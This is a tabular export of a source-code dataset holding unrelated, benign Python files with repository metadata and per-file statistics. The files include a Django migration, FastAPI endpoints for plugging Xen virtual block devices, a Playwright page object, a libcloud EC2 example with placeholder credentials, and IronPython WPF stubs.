### END AUTOGENERATED SECTION | 35.4375 | 71 | 0.810406 | 157 | 1,134 | 5.770701 | 0.55414 | 0.092715 | 0.099338 | 0.046358 | 0.118102 | 0.118102 | 0.086093 | 0.086093 | 0 | 0 | 0 | 0 | 0.137566 | 1,134 | 32 | 72 | 35.4375 | 0.92638 | 0.69224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | true | 0 | 0.777778 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
4f399d57acd5e7e7e858c15b1176f7d92c46f168 | 171 | py | Python | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | t = int(input())
while t > 0:
t -= 1
n,m,s = map(int, input().strip().split(' '))
k = (s+m-1)%n
if(k==0):
print (n)
else:
print (k) | 19 | 48 | 0.391813 | 29 | 171 | 2.310345 | 0.551724 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.368421 | 171 | 9 | 49 | 19 | 0.583333 | 0 | 0 | 0 | 0 | 0 | 0.005814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f62520b0b21b6f7234956507a4d3fe693faf604 | 1,093 | py | Python | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | 3 | 2020-11-23T10:07:47.000Z | 2021-06-15T14:21:32.000Z | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | null | null | null | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | 1 | 2020-12-03T13:40:46.000Z | 2020-12-03T13:40:46.000Z | from setuptools import setup, find_packages
setup(
    name='asteroid_gan_exps',
    version='0.1',
    author='Joris Cosentino',
    author_email='joris.cosentino@inria.fr',
    url="https://github.com/JorisCos/asteroid_gan_exps",
    description='Experiments on GANs using Asteroid',
    license='MIT',
    python_requires='>=3.6',
    # Runtime dependencies required by the experiment code.
    install_requires=['soundfile',
                      'pyyaml',
                      'pandas',
                      'numpy',
                      'tqdm',
                      'asteroid',
                      'scipy',
                      'pystoi'
                      ],
    # Optional extras: install with `pip install asteroid_gan_exps[tests]`.
    extras_require={
        'tests': ['pytest'],
    },
    packages=find_packages(),
    include_package_data=True,
    # Trove classifiers for PyPI indexing.
    classifiers=[
        'Development Status :: 4 - Beta',
        "Programming Language :: Python :: 3",
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
4f749e412e06600292b62125fe88585f0709a995 | 196 | py | Python | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
"MIT"
] | null | null | null | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
"MIT"
] | null | null | null | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
"MIT"
] | null | null | null | class OpticalSystem():
# A class that describes and optical system.
# Assumptions
# A system is composed of optical Surface placed at desired separations along the optical axis
# A | 39.2 | 98 | 0.729592 | 26 | 196 | 5.5 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229592 | 196 | 5 | 99 | 39.2 | 0.94702 | 0.760204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f915f1b509994c7dee62e440312997e1daee417 | 1,803 | py | Python | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | irco-server/ircoapp/migrations/0001_initial.py | go-team-13/IRCO | fc57b69f11eebb6a6f448798581783e0ed525d86 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-01-12 22:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: creates the Program and Site tables and links them.

    Auto-generated by Django; edit with care — applied migrations must not
    change behavior.
    """

    # First migration of the app, so there is nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Program',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('description', models.CharField(max_length=200)),
                ('schedule', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Site',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('location', models.CharField(max_length=200)),
                # Coordinates stored as fixed-point decimals, 5 decimal places.
                ('lat', models.DecimalField(decimal_places=5, max_digits=10)),
                ('lon', models.DecimalField(decimal_places=5, max_digits=10)),
                ('locphone', models.CharField(max_length=200)),
                ('manager', models.CharField(max_length=200)),
                ('mgrphone1', models.CharField(max_length=200)),
                ('mgremail', models.CharField(max_length=200)),
                ('principal', models.CharField(max_length=200)),
                ('prncphone', models.CharField(max_length=200)),
                ('prncemail', models.CharField(max_length=200)),
            ],
        ),
        # Added after both CreateModels so 'ircoapp.Site' already exists:
        # each Program belongs to one Site; deleting a Site cascades.
        migrations.AddField(
            model_name='program',
            name='site',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ircoapp.Site'),
        ),
    ]
| 38.361702 | 114 | 0.570161 | 179 | 1,803 | 5.608939 | 0.374302 | 0.179283 | 0.215139 | 0.286853 | 0.593626 | 0.378486 | 0.304781 | 0.304781 | 0.219124 | 0.219124 | 0 | 0.045277 | 0.289517 | 1,803 | 46 | 115 | 39.195652 | 0.738486 | 0.024958 | 0 | 0.333333 | 1 | 0 | 0.080866 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f9f9223cf5bfe4a7ed7706b97240d3f1466f61e | 506 | py | Python | services/web/server/src/simcore_service_webserver/version_control_tags.py | elisabettai/osparc-simcore | ad7b6e05111b50fe95e49306a992170490a7247f | [
"MIT"
] | null | null | null | services/web/server/src/simcore_service_webserver/version_control_tags.py | elisabettai/osparc-simcore | ad7b6e05111b50fe95e49306a992170490a7247f | [
"MIT"
] | 1 | 2021-11-29T13:38:09.000Z | 2021-11-29T13:38:09.000Z | services/web/server/src/simcore_service_webserver/version_control_tags.py | mrnicegyu11/osparc-simcore | b6fa6c245dbfbc18cc74a387111a52de9b05d1f4 | [
"MIT"
] | null | null | null | import re
from typing import Optional
from models_library.basic_regex import UUID_RE
from models_library.projects import ProjectID
def compose_workcopy_project_tag_name(workcopy_project_id: ProjectID) -> str:
    """Build the repo tag name that marks a working-copy project."""
    return "project:{}".format(workcopy_project_id)
def parse_workcopy_project_tag_name(name: str) -> Optional[ProjectID]:
    """Extract the project id from a working-copy tag name, or None if the
    name does not match the ``project:<uuid>`` shape."""
    match = re.match(rf"^project:(?P<workcopy_project_id>{UUID_RE})$", name)
    if match is None:
        return None
    return ProjectID(match.group("workcopy_project_id"))
| 29.764706 | 77 | 0.76087 | 71 | 506 | 5.126761 | 0.43662 | 0.247253 | 0.186813 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140316 | 506 | 16 | 78 | 31.625 | 0.836782 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.144269 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.363636 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
96ce81643768174ce8b46a62102fbeab46e70afd | 226 | py | Python | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | python-questions-for-pratices/Question-59.py | siddharth-143/Python | 293f4643a3a13e3b82d23fd8922db54dbb0f12bc | [
"MIT"
] | null | null | null | """
Question 59 :
Print a unicode string "hello world".
Hints : Use u'string format to define unicode string
"""
# Solution :
unicode_string = u"hello world!"
print(unicode_string)
"""
Output :
hello world
""" | 14.125 | 56 | 0.659292 | 29 | 226 | 5.068966 | 0.551724 | 0.353742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.221239 | 226 | 16 | 57 | 14.125 | 0.823864 | 0.553097 | 0 | 0 | 0 | 0 | 0.196721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
96d80597e5c02947d02d204bfc1daa1f894484a4 | 829 | py | Python | pages/article_page/article_page.py | savvagen/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 19 | 2020-11-15T16:37:51.000Z | 2022-03-23T02:41:38.000Z | pages/article_page/article_page.py | cjydayang/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 2 | 2021-01-03T21:38:37.000Z | 2021-01-27T08:32:00.000Z | pages/article_page/article_page.py | cjydayang/playwright-pytest-example | acf4e89d0a7dcc1b71b1eb012366b1393f515b41 | [
"Apache-2.0"
] | 8 | 2020-11-05T23:27:37.000Z | 2022-03-16T08:07:00.000Z | import allure
from pages.web_page import WebPage
from pages.web_elements import *
class ArticlePage(WebPage):
    """Page object for a single article, identified by ``article_id``."""

    def __init__(self, base_url, article_id, page: Page):
        super().__init__(page)
        self.base_url = base_url
        self.article_id = article_id

    # Element locators — each call resolves the selector against the live page.
    def title(self): return el(self.page, selector='.container > h1')
    def author_link(self): return el(self.page, selector='.author')
    def subject(self): return el(self.page, selector='div[class*="article-content"] h1')
    def publish_button(self): return el(self.page, selector='text="Publish Article"')
    def tags_field(self): return el(self.page, selector='input[placeholder="Enter tags"]')

    @allure.step
    def open(self):
        """Navigate to this article's URL and wait for the page load event.

        Bug fix: the original formatted the URL as
        ``"%s/#/article/%s" % self.base_url`` (tuple parentheses missing),
        which raises TypeError ("not enough arguments for format string")
        and passed ``self.article_id`` to goto() as a stray positional arg.
        """
        url = "%s/#/article/%s" % (self.base_url, self.article_id)
        self.page.goto(url, wait_until="load")
        return self
| 36.043478 | 93 | 0.689988 | 118 | 829 | 4.661017 | 0.372881 | 0.087273 | 0.109091 | 0.145455 | 0.327273 | 0.254545 | 0 | 0 | 0 | 0 | 0 | 0.002911 | 0.171291 | 829 | 22 | 94 | 37.681818 | 0.797671 | 0 | 0 | 0 | 0 | 0 | 0.15199 | 0.063932 | 0 | 0 | 0 | 0 | 0 | 1 | 0.411765 | false | 0 | 0.176471 | 0.294118 | 0.705882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
96daef619ffbbeaf04e9f747d8fa517872f43cef | 268 | py | Python | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | tests/test_models.py | gilmrjc/djangopress | 8e81e1477661b28a65b6d2ea5cccbf299219734b | [
"MIT"
] | null | null | null | """Test for djangopress.core.models."""
from model_mommy import mommy
from djangopress.core.models import Option
def test_option_str():
    """The string representation of an Option mirrors its ``name`` field."""
    instance = mommy.prepare(Option)
    assert instance.name == str(instance)
| 24.363636 | 55 | 0.735075 | 35 | 268 | 5.542857 | 0.514286 | 0.154639 | 0.216495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152985 | 268 | 10 | 56 | 26.8 | 0.854626 | 0.294776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
96e34a3d56486d6a01c5f875f8afeef7eca56d01 | 2,383 | py | Python | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | API/v1/VBD/plug.py | MisakaMikoto0502/XenXenXenSe | 58a4d288dd2ef3f09ee0062b542b50f0b11d1c43 | [
"MIT"
] | null | null | null | from http.client import RemoteDisconnected
from xmlrpc.client import Fault
from fastapi import APIRouter, HTTPException
from XenAPI.XenAPI import Failure
from XenGarden.session import create_session
from XenGarden.VBD import VBD
from API.v1.Common import xenapi_failure_jsonify
from app.settings import Settings
# Module-level router; the plug/unplug route decorators below register on it.
router = APIRouter()
@router.get("/{cluster_id}/vbd/{vbd_uuid}/plug")
@router.post("/{cluster_id}/vbd/{vbd_uuid}/plug")
async def _vbd_plug(cluster_id: str, vbd_uuid: str):
"""Plug VBD into VM"""
try:
session = create_session(
_id=cluster_id, get_xen_clusters=Settings.get_xen_clusters()
)
vbd: VBD = VBD.get_by_uuid(session=session, uuid=vbd_uuid)
if vbd is not None:
ret = dict(success=vbd.plug())
else:
ret = dict(success=False)
session.xenapi.session.logout()
return ret
except Failure as xenapi_error:
raise HTTPException(
status_code=500, detail=xenapi_failure_jsonify(xenapi_error)
)
except Fault as xml_rpc_error:
raise HTTPException(
status_code=int(xml_rpc_error.faultCode),
detail=xml_rpc_error.faultString,
)
except RemoteDisconnected as rd_error:
raise HTTPException(status_code=500, detail=rd_error.strerror)
@router.delete("/{cluster_id}/vbd/{vbd_uuid}/plug")
@router.get("/{cluster_id}/vbd/{vbd_uuid}/unplug")
@router.post("/{cluster_id}/vbd/{vbd_uuid}/unplug")
async def vbd_unplug(cluster_id: str, vbd_uuid: str):
"""Unplug from VBD"""
try:
session = create_session(
_id=cluster_id, get_xen_clusters=Settings.get_xen_clusters()
)
vbd: VBD = VBD.get_by_uuid(session=session, uuid=vbd_uuid)
if vbd is not None:
ret = dict(success=vbd.unplug())
else:
ret = dict(success=False)
session.xenapi.session.logout()
return ret
except Failure as xenapi_error:
raise HTTPException(
status_code=500, detail=xenapi_failure_jsonify(xenapi_error)
)
except Fault as xml_rpc_error:
raise HTTPException(
status_code=int(xml_rpc_error.faultCode),
detail=xml_rpc_error.faultString,
)
except RemoteDisconnected as rd_error:
raise HTTPException(status_code=500, detail=rd_error.strerror)
| 31.773333 | 72 | 0.671842 | 305 | 2,383 | 5.019672 | 0.216393 | 0.052907 | 0.090137 | 0.113651 | 0.763553 | 0.763553 | 0.724363 | 0.632266 | 0.632266 | 0.632266 | 0 | 0.0071 | 0.231641 | 2,383 | 74 | 73 | 32.202703 | 0.829055 | 0 | 0 | 0.6 | 0 | 0 | 0.072222 | 0.072222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
96e734dc92c9bfe30c09882b5278257f306984ef | 716 | py | Python | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 471 | 2015-01-10T02:55:01.000Z | 2022-03-29T18:07:18.000Z | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 14,354 | 2015-01-01T07:38:23.000Z | 2022-03-31T20:55:14.000Z | custom/api/utils.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 175 | 2015-01-06T07:16:47.000Z | 2022-03-29T13:27:01.000Z | from requests.auth import HTTPBasicAuth
def apply_updates(doc, update_dict):
    """Copy each key/value in *update_dict* onto *doc* as attributes.

    Only attributes whose current value differs (or is missing) are written.
    Returns True if at least one attribute changed, False otherwise.
    """
    changed = False
    for attr, new_value in update_dict.items():
        if getattr(doc, attr, None) == new_value:
            continue  # already up to date — nothing to write
        setattr(doc, attr, new_value)
        changed = True
    return changed
class EndpointMixin(object):
    """Mixin with endpoint construction and HTTP basic-auth helpers.

    ``from_config`` shows the expected constructor signature
    ``(url, username, password)``; ``_auth`` reads ``self.username`` and
    ``self.password``, so the concrete class must provide both.
    """

    @classmethod
    def from_config(cls, config):
        """Alternate constructor from an object exposing url/username/password."""
        return cls(config.url, config.username, config.password)

    def _auth(self):
        """Basic-auth handler built from this endpoint's credentials."""
        return HTTPBasicAuth(self.username, self.password)

    def _urlcombine(self, base, target):
        """Join *base* and *target* by plain string concatenation."""
        return '{}{}'.format(base, target)
| 27.538462 | 64 | 0.674581 | 92 | 716 | 5.152174 | 0.521739 | 0.063291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234637 | 716 | 25 | 65 | 28.64 | 0.864964 | 0.118715 | 0 | 0 | 0 | 0 | 0.022293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.125 | 0.0625 | 0.1875 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 3 |
8c044ba4cf510c73d6cccb54a1d049a9d637e71a | 122 | py | Python | tasksapi/apps.py | mwiens91/saltant | 9e72175a896f5859ada304ad3ae4d84dfc3834db | [
"MIT"
] | 3 | 2018-12-08T01:18:29.000Z | 2018-12-14T23:18:42.000Z | tasksapi/apps.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 3 | 2019-05-23T07:43:13.000Z | 2021-06-10T20:46:53.000Z | tasksapi/apps.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 2 | 2019-03-13T22:31:09.000Z | 2019-05-03T00:18:30.000Z | from django.apps import AppConfig
class TasksApiConfig(AppConfig):
    """Django AppConfig for the ``tasksapi`` application."""

    # Importable name of the application package.
    name = "tasksapi"
    # Human-readable display name for the app.
    verbose_name = "tasks API"
| 17.428571 | 33 | 0.729508 | 14 | 122 | 6.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188525 | 122 | 6 | 34 | 20.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0.139344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8c46b68d6cc2ad4e26c12b0a79dd32ab487a8798 | 253 | py | Python | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 1,435 | 2015-01-07T05:32:51.000Z | 2022-03-25T19:39:34.000Z | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 1,158 | 2015-01-04T18:08:42.000Z | 2022-03-24T14:34:57.000Z | docs/examples/compute/ec2/temporary_credentials.py | dupontz/libcloud | 419c69441ea10e7bbf37319e5e8d02e82e7e6b40 | [
"Apache-2.0"
] | 832 | 2015-01-05T09:20:21.000Z | 2022-03-24T19:22:19.000Z | from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
# Docs example: build the EC2 driver and authenticate with temporary (STS)
# credentials — the token keyword carries the session token that accompanies
# the temporary access/secret key pair.
cls = get_driver(Provider.EC2)
driver = cls(
    'temporary access key',
    'temporary secret key',
    token='temporary session token',
    region="us-west-1",
)
| 36.142857 | 65 | 0.750988 | 34 | 253 | 5.529412 | 0.617647 | 0.12766 | 0.202128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009259 | 0.146245 | 253 | 6 | 66 | 42.166667 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0.284585 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8c471d50f28f4ce276945cd00f4c09e5339f7e4c | 7,272 | py | Python | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Interop_parts/HwndSourceParameters.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class HwndSourceParameters(object):
"""
Contains the parameters that are used to create an System.Windows.Interop.HwndSource object using the System.Windows.Interop.HwndSource.#ctor(System.Windows.Interop.HwndSourceParameters) constructor.
HwndSourceParameters(name: str)
HwndSourceParameters(name: str,width: int,height: int)
"""
def Equals(self,obj):
"""
Equals(self: HwndSourceParameters,obj: HwndSourceParameters) -> bool
Determines whether this structure is equal to a specified
System.Windows.Interop.HwndSourceParameters structure.
obj: The structure to be tested for equality.
Returns: true if the structures are equal; otherwise,false.
Equals(self: HwndSourceParameters,obj: object) -> bool
Determines whether this structure is equal to a specified object.
obj: The objects to be tested for equality.
Returns: true if the comparison is equal; otherwise,false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: HwndSourceParameters) -> int
Returns the hash code for this System.Windows.Interop.HwndSourceParameters
instance.
Returns: A 32-bit signed integer hash code.
"""
pass
def SetPosition(self,x,y):
"""
SetPosition(self: HwndSourceParameters,x: int,y: int)
Sets the values that are used for the screen position of the window for the
System.Windows.Interop.HwndSource.
x: The position of the left edge of the window.
y: The position of the upper edge of the window.
"""
pass
def SetSize(self,width,height):
"""
SetSize(self: HwndSourceParameters,width: int,height: int)
Sets the values that are used for the window size of the
System.Windows.Interop.HwndSource.
width: The width of the window,in device pixels.
height: The height of the window,in device pixels.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
@staticmethod
def __new__(self,name,width=None,height=None):
"""
__new__[HwndSourceParameters]() -> HwndSourceParameters
__new__(cls: type,name: str)
__new__(cls: type,name: str,width: int,height: int)
"""
pass
def __ne__(self,*args):
pass
AcquireHwndFocusInMenuMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the value that determines whether to acquire Win32 focus for the WPF containing window when an System.Windows.Interop.HwndSource is created.
Get: AcquireHwndFocusInMenuMode(self: HwndSourceParameters) -> bool
Set: AcquireHwndFocusInMenuMode(self: HwndSourceParameters)=value
"""
AdjustSizingForNonClientArea=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates whether to include the nonclient area for sizing.
Get: AdjustSizingForNonClientArea(self: HwndSourceParameters) -> bool
Set: AdjustSizingForNonClientArea(self: HwndSourceParameters)=value
"""
ExtendedWindowStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the extended Microsoft Windows styles for the window.
Get: ExtendedWindowStyle(self: HwndSourceParameters) -> int
Set: ExtendedWindowStyle(self: HwndSourceParameters)=value
"""
HasAssignedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether a size was assigned.
Get: HasAssignedSize(self: HwndSourceParameters) -> bool
"""
Height=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value that indicates the height of the window.
Get: Height(self: HwndSourceParameters) -> int
Set: Height(self: HwndSourceParameters)=value
"""
HwndSourceHook=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the message hook for the window.
Get: HwndSourceHook(self: HwndSourceParameters) -> HwndSourceHook
Set: HwndSourceHook(self: HwndSourceParameters)=value
"""
ParentWindow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the window handle (HWND) of the parent for the created window.
Get: ParentWindow(self: HwndSourceParameters) -> IntPtr
Set: ParentWindow(self: HwndSourceParameters)=value
"""
PositionX=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the left-edge position of the window.
Get: PositionX(self: HwndSourceParameters) -> int
Set: PositionX(self: HwndSourceParameters)=value
"""
PositionY=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the upper-edge position of the window.
Get: PositionY(self: HwndSourceParameters) -> int
Set: PositionY(self: HwndSourceParameters)=value
"""
RestoreFocusMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets how WPF handles restoring focus to the window.
Get: RestoreFocusMode(self: HwndSourceParameters) -> RestoreFocusMode
Set: RestoreFocusMode(self: HwndSourceParameters)=value
"""
TreatAncestorsAsNonClientArea=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: TreatAncestorsAsNonClientArea(self: HwndSourceParameters) -> bool
Set: TreatAncestorsAsNonClientArea(self: HwndSourceParameters)=value
"""
TreatAsInputRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
